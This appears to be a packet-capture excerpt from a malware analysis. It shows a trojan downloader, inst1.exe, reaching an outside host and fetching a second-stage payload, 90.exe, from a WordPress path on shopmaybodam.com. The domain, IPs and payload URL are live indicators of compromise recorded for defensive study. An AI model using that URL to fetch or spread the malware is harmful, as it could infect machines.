Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download


2016-09-20 09:02:11.821468 IP 192.168.1.102.59656 > 192.168.1.100.80: Flags [P.], seq 1:336, ack 1, win 256, length 335: HTTP: GET /captured/inst1.exe HTTP/1.1
E..w.[………f…d…P#7….U.P…….GET /captured/inst1.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 09:02:11.821487 IP 192.168.1.100.80 > 192.168.1.102.59656: Flags [.], ack 336, win 237, length 0

E..(.,….LH…f]….&..z..*/..;P… ………
2016-09-20 09:03:55.606661 IP 192.168.1.102.59686 > 93.171.202.162.443: Flags [.], ack 549660, win 2268, length 0
E..(.-….LG…f]….&..z..*/..EP………….
2016-09-20 09:03:55.886564 IP 192.168.1.102.62247 > 75.75.75.75.53: 40557+ A? shopmaybodam.com. (34)
E..>6……^…fKKKK.’.5.*…m………..shopmaybodam.com…..
2016-09-20 09:03:56.183757 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [S], seq 3854319646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….z…fg.’e.’.P..@……. ..-…………..
2016-09-20 09:03:56.463188 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [.], ack 4258741258, win 256, length 0
E..(………..fg.’e.’.P..@…<
P………….
2016-09-20 09:03:56.463600 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [P.], seq 0:356, ack 1, win 256, length 356: HTTP: GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
E………. …fg.’e.’.P..@…<
P…….GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: shopmaybodam.com
